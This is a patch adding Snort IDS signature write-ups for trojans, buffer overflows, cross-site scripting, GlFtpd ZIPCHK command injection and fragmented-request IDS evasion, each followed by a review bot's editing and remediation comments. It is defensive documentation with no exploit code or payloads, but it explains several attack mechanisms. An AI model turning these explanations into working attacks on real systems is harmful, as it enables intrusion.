+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
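Review bot: `Use Apache.` under Corrective Action is not an actionable remediation for this alert; if no vendor fix exists for Hasbani 2.0, say so explicitly and recommend replacing it with a maintained web server or restricting network access to it, and otherwise point to the vendor patch. `Exploits exists` under Ease of Attack should be `Exploits exist`, and `Alternately` under Attack Scenarios should be `Alternatively`. Additional References is empty although exploit code is said to exist; an advisory link would let the affected-version claim be verified.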
--- /dev/null
+++ b/doc/signatures/3445.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3445
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
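Review bot: `false postives from occuring` appears twice (Summary and Detailed Information) and should read `false positives from occurring`. `used in conjunction with other rules` cannot be acted on as written; if this rule sets a flowbit consumed by other rules, name those sids so an operator knows what breaks if it is disabled.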
--- /dev/null
+++ b/doc/signatures/1104.txt
@@ -0,0 +1,59 @@
+Rule:  
+--
+
+Sid:
+1104
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an IDS in a possible 
+web attack by sending an obfuscated request in small increments.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Under normal circumstances, a web request fits inside a single packet. However,
+it is possible to obfuscate a web attack by sending the attack one character
+at a time.  This may evade some IDS systems. Tools such as Whisker can
+be configured to do this.
+
+--
+Affected Systems:
+	All Web Servers
+ 
+--
+Attack Scenarios:
+An attacker can use an automated tool, like Whisker, to launch an attack
+against a web server.
+
+--
+Ease of Attack:
+Simple. Exploits and tools are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
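Review bot: Corrective Action "Check the host for signs of compromise." does not address the evasion described in Detailed Information; because the technique is sending the request one character at a time across packets, the practical mitigation is to make sure the sensor reassembles the stream and normalises the HTTP request before inspection, and that should be stated here. "Original document author unkown" should be "unknown", "IDS systems" is redundant ("some IDSs"), and the separator after "Rule:" (a `--` followed by a blank line) is placed differently from every other file in the patch.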
--- /dev/null
+++ b/doc/signatures/1981.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1981
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
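Review bot: "See also rules with sids 195, 1980, 1981, 1982 and 1983." lists this file's own sid 1981; drop it from the list. "Deepthroat sever" should be "Deepthroat server". In Corrective Action the added key is given as "Systemtray" while the file to remove is systray.exe; say explicitly that Systemtray is the value name under the Run key that launches systray.exe, so the reader removes the right value and does not confuse it with the file.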
--- /dev/null
+++ b/doc/signatures/1843.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1843
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Trinity DDoS Trojan server.
+
+--
+Impact:
+Possible Distributed Denial of Service and control of the victim host.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Trinity is used as a Distributed Denial of Service (DDoS) agent and can 
+launch DDoS attacks from a large number of hosts against a target.
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the Trojan and kill any associated processes.
+
+Restore the system from known good backups.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
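Review bot: "This Trojan affects UNIX operating systems:" ends in a colon but no list follows; either list the systems or end the sentence with a period. The Affected Systems section is missing entirely from this file, although every other file in the patch has one between Detailed Information and Attack Scenarios. "when  an attacker" has a double space. The claim that the client IP address is unlikely to be spoofed should give its reason, namely that the client has to complete a connection to the agent for the event to fire.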
--- /dev/null
+++ b/doc/signatures/3097.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3097
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
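Review bot: Additional References is empty for a vulnerability that has a vendor bulletin; add the Microsoft security bulletin and CVE entry for the License Logging Service overflow. Affected Systems lists "Microsoft Windows Server 2000", which is not a product name (the product is Windows 2000 Server), and there is a stray blank line between the `--` separator and "Corrective Action:" that the other files do not have.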
--- /dev/null
+++ b/doc/signatures/1921.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+
+Sid:
+1921
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability associated with the GlFtpd ZIPCHK command that may permit
+the execution of arbitrary commands with the privileges of the process
+running GlFtpd.
+
+--
+Impact:
+Remote access.  A successful attack may permit the execution of
+arbitrary commands with the privileges of GlFtpd on the vulnerable
+server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a
+vulnerability associated with the ZIPCHK command of the GlFtpd server. 
+GlFtpd provides FTP software for UNIX hosts.  The ZIPCHK command
+supplies integrity checking of a downloaded ZIP file.  The file name
+supplied with the ZIPCHK is not scrutinized to determine if it is a
+valid name.  An attacker can supply a UNIX command with the character
+";" in the argument to the ZIPCHK command, causing the execution of the
+command with the privileges of the process running GlFtpd.
+
+--
+Affected Systems:
+	GlFtpd 1.17.2. 
+
+--
+Attack Scenarios:
+An attacker can remotely execute arbitrary commands on the vulnerable
+server.
+
+--
+Ease of Attack:
+Simple. Exploits code exists.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
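Review bot: "Simple. Exploits code exists." should be "Simple. Exploit code exists.", and "GlFtpd 1.17.2. " has a trailing period and space. Detailed Information explains the flaw well (the ZIPCHK file name reaches a shell unsanitised, so ";" introduces a second command), but Corrective Action "Upgrade to the latest non-affected version of the software." should say which version fixed it or add a reference, since Additional References is empty.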
--- /dev/null
+++ b/doc/signatures/2684.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2684
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure pushdeferredtxns
+. This procedure is included in
+sys.ltutil.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
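Review bot: the sentence "vulnerability in the procedure pushdeferredtxns" / ". This procedure is included in" / "sys.ltutil." is broken across lines with the period on its own line; rejoin it as "...in the procedure pushdeferredtxns. This procedure is included in sys.ltutil." Affected Systems "Oracle Oracle9i" repeats the vendor name (use "Oracle 9i" as 2601.txt does), and "Apply the appropriate vendor supplied patch" lacks a terminating period.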
--- /dev/null
+++ b/doc/signatures/2673.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+2673
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+libpng.
+
+--
+Impact:
+A successful attack may cause a buffer overflow and the subsequent execution
+of arbitrary code on a vulnerable client host.
+
+--
+Detailed Information:
+A vulnerability exists in the way libpng handles the transparency chunk of
+a PNG file, enabling a buffer overflow and the subsequent execution of
+arbitrary code on a vulnerable client.  A PNG datastream consists of a PNG
+marker followed by a sequence of chunks that have a specific format and
+function.
+
+When libpng processes a PNG datastream, it expects to find chunk types
+in a particular order.  For an image with palette color type, the PLTE
+(palette) chunk must precede a tRNS (transparency) chunk.  If it does not,
+an error is generated, but decoding continues.  Due to a logic error,
+the length associated with the tRNS chunk is not properly validated.  A
+length of greater than 256 bytes can cause a buffer overflow and the
+subsequent execution of arbitrary code when the PNG image is processed.
+
+--
+Affected Systems:
+Hosts running libpng 1.2.5 and prior
+Hosts running libpng 1.0.15 and prior
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file on a web server, entice a user
+to download it, possibly causing a buffer overflow on a vulnerable client.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+A false positive may be generated if both the PLTE and tRNS chunks of the PNG
+datastream are not found in the first 300 bytes of the returned packet.  The
+flow_depth parameter of http_inspect can be configured to increase the default
+size of the returned packet.  It should be noted that altering this from the
+default value of 300 bytes may slow performance depending on the type and volume
+of traffic found on your network.
+
+--
+False Negatives:
+An alert may not be generated if PLTE and tRNS chunks of the PNG datastream are
+not found in the first 300 bytes of the returned packet. The flow_depth
+parameter of http_inspect can be configured to increase the default size of the
+returned packet.  It should be noted that altering this from the default value
+of 300 bytes may slow performance depending on the type and volume of traffic
+found on your network.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Joe Stewart <jstewart@lurhq.com>
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597
+
+Bugtraq:
+http://www.securityfocus.com/bid/10872
+
+Other:
+http://scary.beasts.org/security/CESA-2004-001.txt
+
+--
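Review bot: the False Positives paragraph describes a false-negative condition: if the PLTE and tRNS chunks fall beyond the first 300 bytes inspected, the rule misses the alert rather than raising a spurious one, and the text is nearly word for word the False Negatives paragraph that follows it. Replace it with the actual false-positive condition, or with "None known." if there is none. The "Additional References" heading also lacks the colon used in every other file.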
--- /dev/null
+++ b/doc/signatures/119-17.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+119-17
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may indicate improper use of unauthorized web proxy
+servers.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of an unauthorized web proxy by clients on the protected network.
+This event may also be generated if a web client is not using one of the
+configured proxy servers to browse the web.
+
+--
+Affected Systems:
+	All client systems.
+
+--
+Attack Scenarios: 
+A malicious user may try to use an unauthorized proxy server in an
+attempt to subvert company policy on the use of the Internet.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
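Review bot: Corrective Action ("Check the target host for signs of compromise." / "Apply any appropriate vendor supplied patches.") does not fit this event, which Detailed Information describes as a policy alert on clients using an unauthorized web proxy rather than an exploit; the action should be to confirm whether the client bypassed one of the configured proxy servers and to review the list of authorized proxies in the http_inspect configuration. Impact "improper use of unauthorized web proxy servers" is redundant, and there is a stray blank line between the `--` separator and "Corrective Action:".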
--- /dev/null
+++ b/doc/signatures/100000813.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000813
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "file_upload.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "file_upload.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
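Review bot: "may indicate that an exploitation attempt has been attempted" is redundant; "may indicate an exploitation attempt" is enough. "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing" (twice), the `--` separators after "100000813" and after the Affected Systems line lack the blank line that precedes them elsewhere, and the file opens with two blank lines. Affected Systems should name the affected versions of SimpleBoard SBP if known rather than "All systems running CGI applications using SimpleBoard SBP".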
--- /dev/null
+++ b/doc/signatures/1551.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1551
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
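Review bot: the whole body of this file is generic web-server boilerplate with nothing specific to sid 1551 (Detailed Information concedes "the attack scenarios are legion"), and it is identical to 1528.txt later in this patch; at minimum Summary or Detailed Information should name the request or application the rule actually matches so an analyst can triage the alert. "attackers choosing" should be "attacker's choosing".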
--- /dev/null
+++ b/doc/signatures/2509.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2509
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
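Review bot: "suscessful" should be "successful" and "attcker" should be "attacker"; "The problem lies in an unchecked buffer in the LSASS service, suscessful exploitation may present..." is a comma splice and should be split at the comma. "Apply the appropriate vendor supplied patches" lacks a terminating period, and Additional References is empty although this is a vendor-patched Microsoft issue; add the bulletin reference.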
--- /dev/null
+++ b/doc/signatures/1007.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1007
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
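Review bot: Corrective Action tells an in-house application owner only to "ensure that it properly validates input", but Detailed Information locates the bug in reflecting input "as part of the HTML of a new page without filtering", so the advice should also name encoding or escaping untrusted data when it is written into HTML; input validation alone does not cover the case. "legimately" should be "legitimately".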
--- /dev/null
+++ b/doc/signatures/1528.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1528
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
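Review bot: this file is a verbatim copy of 1551.txt apart from the sid, so neither entry says what sid 1528 matches; add rule-specific detail to Summary or Detailed Information. "attackers choosing" should be "attacker's choosing".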
--- /dev/null
+++ b/doc/signatures/1962.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1962
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rquotad is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rquotad is using.  Attackers can also learn what versions of the rquotad protocol are accepted by rquotad. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rquotad run.  The rquotad RPC service can be queried for user disk usage and the limits of a local file system which is mounted by a remote machine over the NFS.  A vulnerability associated with rquotad may permit the execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rquotad runs.  This may be a precursor to accessing rquotad.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rquotad, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rquotad, not probes of the rquotad service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rquotad service itself. An attacker may attempt to go directly to the rquotad port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
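Review bot: Detailed Information says a vulnerability in rquotad "may permit the execution of arbitrary commands with the privileges of root", yet Additional References is empty; add the advisory that backs that claim. "Easy.  " carries trailing spaces, "over the NFS" should be "over NFS", and Summary is followed by two blank lines where the other files use one.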
--- /dev/null
+++ b/doc/signatures/1300.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1300
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
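Review bot: Affected Systems is empty; either list the systems or use "All systems using a web server." as 1551.txt does. "running ona web server" should be "on a web server". Attack Scenarios ("An attacker can access the authentication mechanism and supply his/her own credentials") does not describe the "authentication vulnerability" the Summary promises; one of the two sections should say what weakness the rule detects.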
--- /dev/null
+++ b/doc/signatures/731.txt
@@ -0,0 +1,97 @@
+Rule:
+
+--
+Sid:
+731
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
